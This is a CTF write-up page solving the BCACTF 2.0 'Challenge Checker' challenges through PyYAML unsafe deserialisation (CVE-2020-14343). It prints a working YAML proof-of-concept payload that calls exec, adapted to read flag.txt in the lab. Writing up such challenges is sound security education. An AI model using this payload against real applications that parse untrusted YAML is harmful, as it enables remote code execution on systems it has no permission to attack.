π¨π»
π¨π»
π¨π»
π¨π»
CTFs
Home
Pentesting
Learn
Searchβ¦
π©
Zeyu's CTF Writeups
Home
Pentesting
My Vulnerable Website
My Challenges
SEETF 2022
Cyber League Major 1
STANDCON CTF 2021
2022
BSidesTLV 2022 CTF
Grey Cat The Flag 2022
DEF CON CTF 2022 Qualifiers
Securinets CTF Finals 2022
NahamCon CTF 2022
Securinets CTF Quals 2022
CTF.SG CTF
YaCTF 2022
DiceCTF 2022
TetCTF 2022
2021
hxp CTF 2021
HTX Investigator's Challenge 2021
Metasploit Community CTF
MetaCTF CyberGames
CyberSecurityRumble CTF
The InfoSecurity Challenge (TISC) 2021
SPbCTF's Student CTF Quals
Asian Cyber Security Challenge (ACSC) 2021
CSAW CTF Qualification Round 2021
YauzaCTF 2021
InCTF 2021
UIUCTF 2021
Google CTF 2021
TyphoonCon CTF 2021
DSTA BrainHack CDDC21
BCACTF 2.0
L10N Poll
Challenge Checker
Discrete Mathematics
Advanced Math Analysis
Math Analysis
American Literature
More Than Meets the Eye
ττ²τΊτΈτ«τΊ·τ§»ττΈ
Zh3ro CTF V2
Pwn2Win CTF 2021
NorzhCTF 2021
DawgCTF 2021
UMDCTF 2021
Midnight Sun CTF 2021
picoCTF 2021
DSO-NUS CTF 2021
Powered By
GitBook
Challenge Checker
PyYAML deserialisation vulnerability (CVE-2020-14343).
Challenge Checker 1
We are prompted to paste in YAML data. We can see from the code that
yaml.load()
is used to load the data.
1
from
yaml
import
load
2
β
3
...
4
β
5
def
check
(
raw_data
)
->
"Tuple[list[str], list[str]]"
:
6
data
=
load
(
raw_data
)
Copied!
There exists a deserialization exploit in PyYAML that was only fixed in version 5.4.1.
Issue:
https://github.com/yaml/pyyaml/issues/420
GitHub Advisory (CVE-2020-14343):
https://github.com/advisories/GHSA-8q59-q68h-6hv4
β
We can see from
requirements.txt
that the version is 3.13, which is vulnerable.
1
PyYAML==3.13
2
termcolor==1.1.0
Copied!
From the GitHub issue, we can find some of the proof of concept exploits. For instance:
1
-
!!python/object/new:str
2
args
:
[]
3
state
:
!!python/tuple
4
-
"RCE_HERE"
5
-
!!python/object/new:staticmethod
6
args
:
[
0
]
7
state
:
8
update
:
!!python/name:exec
Copied!
So, in the
chall.yaml
, I simply added this PoC under
authors:
1
authors
:
2
-
anli
3
-
Edward Feng
4
-
!!python/object/new:str
5
args
:
[]
6
state
:
!!python/tuple
7
-
"print(open('flag.txt').read())"
8
-
!!python/object/new:staticmethod
9
args
:
[
0
]
10
state
:
11
update
:
!!python/name:exec
12
visible
:
true
Copied!
This executes
print(open('flag.txt').read())
and reads the flag.
Challenge Checker 2
The only change is that PyYAML is now version 5.3.1.
1
PyYAML==5.3.1
2
termcolor==1.1.0
Copied!
But the exploit we used previously affected all versions below 5.4.1, so it works here too.
Previous
L10N Poll
Next
Discrete Mathematics
Last modified
1mo ago
Copy link
Contents
Challenge Checker 1
Challenge Checker 2